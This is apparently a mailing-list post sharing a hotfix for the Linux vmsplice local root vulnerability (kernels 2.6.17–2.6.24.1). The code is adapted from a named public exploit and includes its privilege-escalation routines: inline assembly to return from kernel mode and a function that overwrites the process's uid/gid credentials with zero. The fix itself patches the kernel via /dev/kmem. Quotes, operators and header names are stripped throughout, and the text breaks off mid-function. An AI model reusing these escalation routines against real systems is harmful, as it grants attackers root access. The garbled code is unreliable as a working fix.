I modified the hotfix so it will also patch compat_sys_vmsplice, which
would be important on amd64 boxen with x86 compatibility enabled.
It's attached, or if for some reason it doesn't make it through, you can
fetch it from
http://www.andrew.cmu.edu/~aij/disable-vmsplice-if-exploitable-aij.c
Ivan/*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.17 - 2.6.24.1
*/
#define _GNU_SOURCE
#include stdio.h
#include errno.h
#include stdlib.h
#include string.h
#include malloc.h
#include limits.h
#include signal.h
#include unistd.h
#include sys/uio.h
#include sys/mman.h
#include fcntl.h
#include asm/page.h
#define __KERNEL__
#include asm/unistd.h
#define PIPE_BUFFERS16
#define PG_compound 14
#define uintunsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x)(x + sizeof(x) - 40)
struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};
voidexit_code();
charexit_stack[1024 * 1024];
voiddie(char *msg, int err)
{
printf(err ? [-] %s: %s\n : [-] %s\n, msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}
#if defined (__i386__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246
static_inline
voidexit_kernel()
{
__asm__ __volatile__ (
movl %0, 0x10(%%esp) ;
movl %1, 0x0c(%%esp) ;
movl %2, 0x08(%%esp) ;
movl %3, 0x04(%%esp) ;
movl %4, 0x00(%%esp) ;
iret
: : i (USER_SS), r (STACK(exit_stack)), i (USER_FL),
i (USER_CS), r (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
movl %%esp, %%eax ;
andl %1, %%eax ;
movl (%%eax), %0
: =r (curr)
: i (~8191)
);
return (void *) curr;
}
#elif defined (__x86_64__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif
#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246
static_inline
voidexit_kernel()
{
__asm__ __volatile__ (
swapgs ;
movq %0, 0x20(%%rsp) ;
movq %1, 0x18(%%rsp) ;
movq %2, 0x10(%%rsp) ;
movq %3, 0x08(%%rsp) ;
movq %4, 0x00(%%rsp) ;
iretq
: : i (USER_SS), r (STACK(exit_stack)), i (USER_FL),
i (USER_CS), r (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
movq %%gs:(0), %0
: =r (curr)
);
return (void *) curr;
}
#else
#error unsupported arch
#endif
#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)
#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif
static uint uid, gid;
voidkernel_code()
{
int i;
uint*p = get_current();
for (i = 0; i 1024-13; i++) {
if (p[0] == uid p[1] == uid
p[2] == uid p[3] == uid
p[4] == gid p[5] == gid
p[6] == gid p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}
exit_kernel();
}
voidde_exploit()
{
char line[4096];
FILE* ksyms = fopen(/proc/kallsyms, r);
size_t address = 0;
size_t compat_address = 0;
if(!ksyms)
{
perror(Could not open /proc/kallsyms);
exit(EXIT_FAILURE);
}
while(fgets(line, sizeof(line), ksyms))
{
if(strstr(line, sys_vmsplice))
{
sscanf(line, %zx, address);
}
if(strstr(line, compat_sys_vmsplice))
{
sscanf(line, %zx, compat_address);
}
}
if(!address)
{
fprintf(stderr, Address not found\n);
exit(EXIT_FAILURE);
}
int fd = open(/dev/kmem, O_RDWR);
if(fd == -1)
{
perror(open(\/dev/kmem\));
exit(EXIT_FAILURE);
}
char* map = mmap(0, 0x20, PROT_READ | PROT_WRITE, MAP_SHARED, fd, address
~0xFFF);
if(map == MAP_FAILED)
{
perror(mmap);
exit(EXIT_FAILURE);
}
map[address 0xfff] = 0xc3; /* 0xC3 = RET */
if (compat_address) {
printf(Patched sys_vmsplice, now patching compat_sys_vmsplice\n);
char* map = mmap(0, 0x20, PROT_READ | PROT_WRITE, MAP_SHARED, fd,
compat_address ~0xFFF);
if(map == MAP_FAILED)
{
perror(mmap);
exit(EXIT_FAILURE);
}